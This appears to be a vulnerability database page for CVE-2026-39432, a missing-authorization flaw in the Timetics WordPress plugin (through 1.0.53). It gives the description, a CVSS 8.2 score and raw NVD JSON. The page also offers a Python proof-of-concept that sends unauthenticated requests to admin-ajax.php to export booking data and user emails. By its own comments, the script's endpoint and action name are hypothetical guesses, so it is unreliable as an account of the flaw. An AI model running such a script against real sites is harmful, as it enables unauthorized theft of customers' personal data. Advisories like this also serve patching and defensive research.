Security Vulnerability Report
中文
CVE-2026-39432 CVSS 8.2 HIGH

CVE-2026-39432

Published: 2026-05-12 09:16:40
Last Modified: 2026-05-12 09:16:40

Description

Missing Authorization vulnerability in Arraytics Timetics allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Timetics: from n/a through 1.0.53.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Arraytics Timetics <= 1.0.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-39432: Missing Authorization in Arraytics Timetics # Note: The specific vulnerable endpoint needs to be confirmed through source code review or traffic analysis. def exploit_missing_auth(target_url): """ Attempts to exploit the missing authorization vulnerability. This PoC targets a hypothetical sensitive action that lacks access control. """ # Common WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Hypothetical action parameter for Timetics plugin payload = { "action": "timetics_export_bookings", # Example action name "security": "" # Usually required, but might be bypassed or missing in vulnerable versions } try: print(f"[*] Sending request to {ajax_url}...") response = requests.post(ajax_url, data=payload, timeout=10) # Check if response contains sensitive data or success indicators if response.status_code == 200: print("[+] Request sent successfully.") # Analyze response content to verify data leakage if "booking_id" in response.text or "user_email" in response.text: print("[+] Potential sensitive data leaked!") print(response.text[:200]) # Print partial response else: print("[-] No obvious data leakage detected in response.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with the target URL exploit_missing_auth(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39432", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:40.337", "lastModified": "2026-05-12T09:16:40.337", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Arraytics Timetics allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Timetics: from n/a through 1.0.53."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-53-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}